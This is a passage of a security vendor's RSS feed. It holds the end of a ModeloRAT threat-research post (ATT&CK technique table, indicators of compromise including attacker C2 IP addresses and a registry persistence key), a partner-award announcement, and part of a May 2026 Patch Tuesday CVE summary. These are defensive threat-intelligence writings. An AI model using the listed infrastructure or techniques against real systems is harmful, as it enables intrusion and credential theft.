Loading</p></td></tr><tr><td><p>T1036.005</p></td><td><p>Masquerading</p></td></tr><tr><td><p>T1140</p></td><td><p>Deobfuscate/Decode Files or Information</p></td></tr><tr><td><p>T1112</p></td><td><p>Modify Registry</p></td></tr><tr><td><p>T1055</p></td><td><p>Process Injection</p></td></tr><tr><td><p>T1056.002</p></td><td><p>Input Capture: GUI Input Capture</p></td></tr><tr><td><p>T1558.003</p></td><td><p>Steal or Forge Kerberos Tickets: Kerberoasting</p></td></tr><tr><td><p>T1003.001</p></td><td><p>OS Credential Dumping: LSASS Memory</p></td></tr><tr><td><p>T1003</p></td><td><p>OS Credential Dumping</p></td></tr><tr><td><p>T1018</p></td><td><p>Remote System Discovery</p></td></tr><tr><td><p>T1087.002</p></td><td><p>Account Discovery: Domain Account</p></td></tr><tr><td><p>T1082</p></td><td><p>System Information Discovery</p></td></tr><tr><td><p>T1016</p></td><td><p>System Network Configuration Discovery</p></td></tr><tr><td><p>T1033</p></td><td><p>System Owner/User Discovery</p></td></tr><tr><td><p>T1083</p></td><td><p>File and Directory Discovery</p></td></tr><tr><td><p>T1021.006</p></td><td><p>Remote Services: WinRM</p></td></tr><tr><td><p>T1021.001</p></td><td><p>Remote Services: RDP</p></td></tr><tr><td><p>T1570</p></td><td><p>Lateral Tool Transfer</p></td></tr><tr><td><p>T1071.001</p></td><td><p>Application Layer Protocol: Web Protocols</p></td></tr><tr><td><p>T1095</p></td><td><p>Non-Application Layer Protocol</p></td></tr><tr><td><p>T1090.001</p></td><td><p>Proxy: Internal Proxy</p></td></tr><tr><td><p>T1090.002</p></td><td><p>Proxy: External Proxy</p></td></tr><tr><td><p>T1572</p></td><td><p>Protocol Tunneling</p></td></tr><tr><td><p>T1573</p></td><td><p>Encrypted Channel</p></td></tr><tr><td><p>T1132.001</p></td><td><p>Data Encoding: Standard Encoding</p></td></tr><tr><td><p>T1568</p></td><td><p>Dynamic Resolution</p></td></tr><tr><td><p>T1567.002</p></td><td><p>Exfiltration Over Web Service</p></td></tr><tr><td><p>T1041</p></td><td><p>Exfiltration Over C2 Channel</p></td></tr></tbody></table><h2 style="direction: ltr;">Indicators of compromise (IOCs)</h2><table><colgroup data-width='1303'><col style="width:17.805065234075208%"/><col style="width:28.242517267843436%"/><col style="width:53.95241749808135%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Category</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Indicator Type</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Value</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Attacker Infrastructure</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rogue M365 Tenant (Sender)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>itsupport@UCICasociacion.onmicrosoft.com</span></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Attacker Infrastructure</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Tenant GUID</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>cdc15b4d-6fd6-4e90-9ee9-357fea475047</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Attacker Infrastructure</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Client Hostnames</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>RICARDOGARC05B2, KALI-LINUX-2025-2</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Attacker Infrastructure</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Initial Access Vector</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>MS Teams external chat (Impersonating "IT Support")</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Network C2</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Pmanager.py (ModeloRAT Beacon)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>46.225.231.170, 144.172.99.68, 64.94.85.158, 140.82.6.45, 45.76.241.51 </span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Network C2</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>collector.py (Exfiltration)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>87.120.186.229, 149.248.78.202 (Port 80)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Network C2</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>internal.py / Microsoft5237.py</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>87.120.186.229, 149.248.78.202 (Port 80)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Network C2</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>USOShared1297.py (TCP Shell)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>144.172.88.18, 64.190.113.187, 45.59.122.231 (Ports 50508, 60503)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Network C2</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>PCDr6967.py (SOCKS5)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>96.9.125.29, 144.172.111.49, 104.194.152.246 (Port 50504)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Network C2</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Dell508.py (HTTP Tunnel)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>207.246.114.50, 149.28.96.170 (Port 80)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Persistence Host</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Cloud Files Provider Name</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>PLURIBUS</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Persistence Host</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Cloud Files Provider GUID</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>{904EE598-0511-4664-82A8-22C4A7501044}</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Persistence Host</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Registry Persistence Key</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager\PLURIBUS!*</span></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Persistence Host</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Sync Root Path</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>%TEMP%\cldflt\</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Persistence Host</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Placeholder File</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>%TEMP%\cldflt\Link.log</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'>More indicators of compromise can be found on Rapid7’s </span><a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/ModeloRat" target="_blank"><span style='font-size: undefined;'>GitHub</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Key findings</h2><ul><li style="direction: ltr;"><span style='font-size: undefined;'>ModeloRAT pivoted from browser extensions to Teams social engineering.</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>Portable Python environments bypass traditional EDR signatures.</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>CVE-2023-36036 remains effective despite patch availability.</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>Fake lock screens can harvest credentials even with SYSTEM access.</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>WebDAV API abuse provides stealthy credential validation.</span></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>It took two days to go from "Hi, this is IT support" to domain-wide credential access using a fake lock screen, a Python based RAT, and a two-year-old kernel exploit. If you were an incident responder, none of these techniques would have been new for you, and that’s the point.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>What particularly stands out is how quickly control shifted from endpoint to identity. Once valid credentials were obtained, the environment itself became the attack surface.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-it-support-dissecting-modelorat-campaign-microsoft-teams-compromise</link>
      <guid isPermaLink="false">blt21acae6556d6ea8d</guid>
      <category><![CDATA[Malware]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Anna Širokova]]></dc:creator>
      <pubDate>Wed, 13 May 2026 14:44:02 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt83e3180716d766f0/69b180eb669f1ce1a02fe1aa/Purple-teaming-in-2026-hero.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Partner Academy: Driving Impact with Gold Stevie Award-Winning Partner Services Certifications]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, our commitment to our partners is built on the foundation of the </span><span style='font-size: undefined;'><strong>PACT (Partnering with Accountability, Consistency, and Transparency)</strong></span><span style='font-size: undefined;'> program. Central to this mission is the Rapid7 Partner Academy, which was recently honored with a </span><a href="https://aba.stevieawards.com/Awards/stevie-award-winners/" target="_blank"><span style='font-size: undefined;'>Gold Stevie Award</span></a><span style='font-size: undefined;'> in the 2026 American Business Awards® for </span><span style='font-size: undefined;'><strong>Achievement in Collaboration and Partnership</strong></span><span style='font-size: undefined;'>. This recognition underscores our dedication to providing </span><a href="/blog/post/empowering-our-partners-the-new-rapid7-partner-academy-is-hitting-the-mark" target="_self"><span style='font-size: undefined;'>world-class training</span></a><span style='font-size: undefined;'> that translates directly into partner success and customer resilience.</span></p><h2>A new era of partner-led services</h2><p style="direction: ltr;"><span style='font-size: undefined;'>To meet the evolving needs of the cybersecurity landscape, Rapid7 Partner Academy has introduced specialized </span><a href="https://www.crn.com/news/security/2025/rapid7-revamps-partner-program-to-drive-security-services-specializations" target="_blank"><span style='font-size: undefined;'>Partner Services Certifications</span></a><span style='font-size: undefined;'>. These role-based learning paths are designed to move beyond traditional "product training" by focusing on high-fidelity service delivery and outcome-driven results, including how to build, deliver, and scale services on Rapid7 solutions. The training and certification program was specifically recognized for its "Partner-First" design, which was built through extensive collaboration with our global partner ecosystem to ensure alignment with real-world sales and technical challenges.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Our award-winning partner services certification ecosystem focuses on three critical pillars of the Rapid7 Command Platform:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Partner Services for InsightIDR:</strong></span><span style='font-size: undefined;'> Equips partners with the skills and knowledge necessary to effectively guide customers through the post-sale phases of the InsightIDR solution.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Partner Services for Exposure Command:</strong></span><span style='font-size: undefined;'> Focuses on the transition from static vulnerability scanning to continuous attack surface validation, diving into the setup, management, and troubleshooting of Exposure Command.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Partner Services for Vulnerability Management:</strong></span><span style='font-size: undefined;'> Empowers partners to provide impactful services around deployment, management, and ongoing support for InsightVM that drive customer success.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>All three of these Partner Services Certifications enable our partners to deliver services around Rapid7 solutions from deployment and onboarding, to management and best practices for usage, to express health checks and troubleshooting. Upon successful completion of the course theoretical exam, you are eligible to enroll in the Services Validation Component. After validating your services capabilities, you will receive the prestigious distinction of achieving the </span><span style='font-size: undefined;'><strong>Rapid7 Partner Services Certification and Badge.</strong></span><span style='font-size: undefined;'> This achievement helps to differentiate your services to your customers and prospects with official recognition among the most capable Rapid7 MSSPs and service delivery partners.</span></p><h2>Real-world impact: From training to execution</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><a href="https://aba.stevieawards.com/Awards/stevie-award-winners/" target="_blank"><span style='font-size: undefined;'>Gold Stevie Award</span></a><span style='font-size: undefined;'> recognizes more than just curriculum—it recognizes the impact these certifications have on the partner's ability to drive business and accelerate their profitability with Rapid7. By completing these Rapid7 Partner Academy certifications, partners gain:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Operational excellence:</strong></span><span style='font-size: undefined;'> Technical specialists learn to deploy and manage Rapid7 solutions with a "Gold Standard" approach, ensuring high-fidelity results for customers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Strategic alignment:</strong></span><span style='font-size: undefined;'> Sales professionals are trained in the </span><span style='font-size: undefined;'><strong>RSP (Rapid7 Sales Professional)</strong></span><span style='font-size: undefined;'> methodology, allowing them to position Rapid7 as the preferred solution through effective discovery and objection handling.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Program economics:</strong></span><span style='font-size: undefined;'> Certified partners can take full advantage of the </span><a href="/about/press-releases/rapid7-advances-2026-pact-partner-program-to-strengthen-partner-led-go-to-market-and-profitability" target="_self"><span style='font-size: undefined;'><strong>2026 PACT updates</strong></span></a><span style='font-size: undefined;'>, which offer enhanced incentives and streamlined deal motions for partner-led growth.</span></p></li></ul><h2>Collaborating for success</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The Stevie Award for </span><span style='font-size: undefined;'><strong>Achievement in Collaboration and Partnership</strong></span><span style='font-size: undefined;'> specifically applauds how Rapid7 integrated partner feedback into the curriculum development. This wasn't just Rapid7 talking to partners; it was a co-innovation effort. By coordinating with partners and Rapid7 technical support stakeholders, we ensured that the Partner Academy content directly addresses the "last-mile" technical blockers partners face in the field.</span></p><p style="direction: ltr;"><span style='color:rgb(29, 28, 29);font-size: undefined;'>The value and impact of Partner Academy is highlighted by the comments from the Stevie American Business Awards</span><span style='font-size: undefined;'>®</span><span style='color:rgb(29, 28, 29);font-size: undefined;'> judges:</span></p><p><em>"I’ve seen a lot of partner programs, and most are built for the vendor, not the partner. This one stands out...A 5X outperformance, 76% completion rate, 91% satisfaction, and an NPS of 68 all point to real value delivered, not vanity metrics. I’m especially impressed by the coordination behind it –100 contributors across 13 business units. That level of alignment is hard to achieve, and it shows strong leadership. The fact that the program was mentioned on an earnings call also signals clear strategic impact."</em></p><p><em>"Overall, this is an outstanding and result-oriented program, and it sets the bar high for the partner enablement process. Exceeding the certification target by 5X within a significantly shortened timeframe speaks volumes for the relevance and execution of the program, and the creation of role-based, technically sophisticated learning paths speaks volumes for the focus on partner enablement."</em></p><h2>Celebrating our partners</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This award is a shared victory with the thousands of partner individuals who have invested in their professional development through the Partner Academy. Whether you are a technical expert seeking to “Command the Attack Surface” or a sales professional looking to protect your margins, the Partner Academy is your gateway to success in the Rapid7 ecosystem.</span></p><h3>Join the award-winning program and start your learning journey today!</h3><p style="direction: ltr;"><span style='font-size: undefined;'>As we continue to innovate, our goal remains the same: to provide the most transparent, consistent, and world-class enablement program in the industry. We invite all partners to officially </span><a href="/partners/sales-partners" target="_self"><span style='font-size: undefined;'>become a Rapid7 PACT Partner</span></a><span style='font-size: undefined;'> to explore these award-winning certifications and start driving deeper impact for your customers today.</span></p><hr>]]></description>
      <link>https://www.rapid7.com/blog/post/c-gold-stevie-award-winning-partner-services-certifications-academy</link>
      <guid isPermaLink="false">blte391e6776e800cc6</guid>
      <category><![CDATA[Awards]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 13 May 2026 13:54:10 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt30cad4cead79d2d3/6846a7113860835cfa35e65d/surface-command.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - May 2026]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is publishing 137 vulnerabilities on </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-May"><span style='font-size: undefined;'>May 2026 Patch Tuesday</span></a><span style='font-size: undefined;'>. Microsoft is not aware of exploitation in the wild or public disclosure for any of these vulnerabilities. So far this month, Microsoft has provided patches to address 133 browser vulnerabilities, which are not included in the Patch Tuesday count above.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows Netlogon: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Anyone responsible for securing a domain controller should prioritize remediation of </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-41089"><span style='font-size: undefined;'>CVE-2026-41089</span></a><span style='font-size: undefined;'>, which is a critical stack-based buffer overflow in Windows Netlogon with a CVSS v3 base score of 9.8. Exploitation leads to execution in the context of the Netlogon service, so that’s SYSTEM privileges on the domain controller. For most pentesters, that’s the point at which the customer report more or less writes itself. No privileges or user interaction are required, and attack complexity is low, which suggests that creation of a reliable exploit might not be especially difficult for anyone with knowledge of the specific mechanism.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft assesses exploitation as less likely, but since those exploitability assessments are provided without an accompanying explanation, it’s not clear how much reassurance defenders should take. Anyone who remembers the much-discussed </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472"><span style='font-size: undefined;'>CVE-2020-1472</span></a><span style='font-size: undefined;'> (aka ZeroLogon) back in 2020 will note that </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-41089"><span style='font-size: undefined;'>CVE-2026-41089</span></a><span style='font-size: undefined;'> offers an attacker more immediate control of a domain controller. Patches are available for all versions of Windows Server from 2012 onwards.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows DNS Client: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>An attacker looking for a master key for Windows assets will pay attention to </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-41096"><span style='font-size: undefined;'>CVE-2026-41096</span></a><span style='font-size: undefined;'>, a critical RCE in the Windows DNS client implementation. A modern computer talks to DNS the way a child in the back of a car asks “are we there yet?” The variable and complex structure of DNS responses means that DNS client implementations are also complex and thus prone to flaws. Microsoft assesses exploitation as less likely, and we can hope that modern mitigations such as heap address randomization and optional-but-recommended encrypted channel DNS will make weaponization significantly more challenging by putting barriers across specific paths to exploitation. The DNS client on Windows runs as the NetworkService role, rather than SYSTEM, but a foothold is a foothold, and skilled attackers expect to chain exploits together.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>JIRA/Confluence Entra ID auth plugin: critical EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>If you’re still self-hosting Atlassian JIRA or Confluence and relying on the Microsoft Entra ID authentication plugin, you’ll want to know about </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-41103"><span style='font-size: undefined;'>CVE-2026-41103</span></a><span style='font-size: undefined;'>. This critical elevation of privilege vulnerability allows an unauthorized attacker to impersonate an existing user by presenting forged credentials, thus bypassing Entra ID. Microsoft expects that exploitation is more likely. Even if you can’t always find what you want on the corporate Confluence, a motivated attacker probably will. Curiously, the patch links on the advisory lead to older versions of the plugins published in 2024.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft WARP team</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft’s WARP team is credited with multiple critical vulnerabilities today, after making their first appearance in MSRC advisory acknowledgements in last month’s Patch Tuesday. We can speculate that they likely know a great deal about the current state of AI-powered vulnerability research as it applies to Microsoft products.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>There are no significant Microsoft product lifecycle changes this month. Microsoft .NET 9 STS (Standard Term Support, as distinct from Long Term Support) was originally scheduled to move past the end of support in May 2026, but late last year, Microsoft </span><a href="https://devblogs.microsoft.com/dotnet/dotnet-sts-releases-supported-for-24-months/#:~:text=To%20solve%20this%20problem%2C%20we,Original%20Release%20Date"><span style='font-size: undefined;'>granted a six-month extension</span></a><span style='font-size: undefined;'>, so that </span><a href="https://learn.microsoft.com/en-us/lifecycle/products/microsoft-net-and-net-core"><span style='font-size: undefined;'>.NET 9 STS</span></a><span style='font-size: undefined;'> now reaches end of support on November 10, 2026.</span></p><h2>Summary charts</h2><h2></h2><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt818426e9f5e515fd/6a03c94272d70a4176278519/2026-05-vuln_count_component.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt818426e9f5e515fd/6a03c94272d70a4176278519/2026-05-vuln_count_component.png" data-sys-asset-uid="blt818426e9f5e515fd" data-sys-asset-filename="2026-05-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" data-sys-asset-position="center" sys-style-type="display"/></figure><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte4570cc11c0293b3/6a03c9427575976c98e852e2/2026-05-vuln_count_impact.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte4570cc11c0293b3/6a03c9427575976c98e852e2/2026-05-vuln_count_impact.png" data-sys-asset-uid="blte4570cc11c0293b3" data-sys-asset-filename="2026-05-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted7c42c87882c725/6a03c94265263cb3d78617de/2026-05-vuln_count_impact-component-heatmap.png" alt="A heatmap showing distribution of impact type by component for Microsoft Patch Tuesday 2026-May" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A heatmap showing distribution of impact type by component for Microsoft Patch Tuesday 2026-May" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted7c42c87882c725/6a03c94265263cb3d78617de/2026-05-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="blted7c42c87882c725" data-sys-asset-filename="2026-05-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A heatmap showing distribution of impact type by component for Microsoft Patch Tuesday 2026-May" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><h2>Summary tables</h2><p></p><h3>Apps vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26129">CVE-2026-26129</a></td><td><p>M365 Copilot Information Disclosure Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26164">CVE-2026-26164</a></td><td><p>M365 Copilot Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41614">CVE-2026-41614</a></td><td><p>M365 Copilot for Desktop Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41100">CVE-2026-41100</a></td><td><p>Microsoft 365 Copilot for Android Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42832">CVE-2026-42832</a></td><td><p>Microsoft Office Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41101">CVE-2026-41101</a></td><td><p>Microsoft Word for Android Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.1</p></td></tr></tbody></table><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35435">CVE-2026-35435</a></td><td><p>Azure AI Foundry Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>8.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35428">CVE-2026-35428</a></td><td><p>Azure Cloud Shell Spoofing Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32207">CVE-2026-32207</a></td><td><p>Azure Machine Learning Notebook Spoofing Vulnerability</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33109">CVE-2026-33109</a></td><td><p>Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33844">CVE-2026-33844</a></td><td><p>Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41105">CVE-2026-41105</a></td><td><p>Azure Monitor Action Group Notification System Elevation of Privilege Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40379">CVE-2026-40379</a></td><td><p>Microsoft Enterprise Security Token Service (ESTS) Spoofing Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34327">CVE-2026-34327</a></td><td><p>Microsoft Partner Center Spoofing Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>8.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40381">CVE-2026-40381</a></td><td><p>Azure Connected Machine Agent Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42823">CVE-2026-42823</a></td><td><p>Azure Logic Apps Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33833">CVE-2026-33833</a></td><td><p>Azure Machine Learning Notebook Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32204">CVE-2026-32204</a></td><td><p>Azure Monitor Agent Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42830">CVE-2026-42830</a></td><td><p>Azure Monitor Agent Metrics Extension Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33117">CVE-2026-33117</a></td><td><p>Azure SDK for Java Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41103">CVE-2026-41103</a></td><td><p>Microsoft SSO Plugin for Jira & Confluence Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41086">CVE-2026-41086</a></td><td><p>Windows Admin Center in Azure Portal Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less 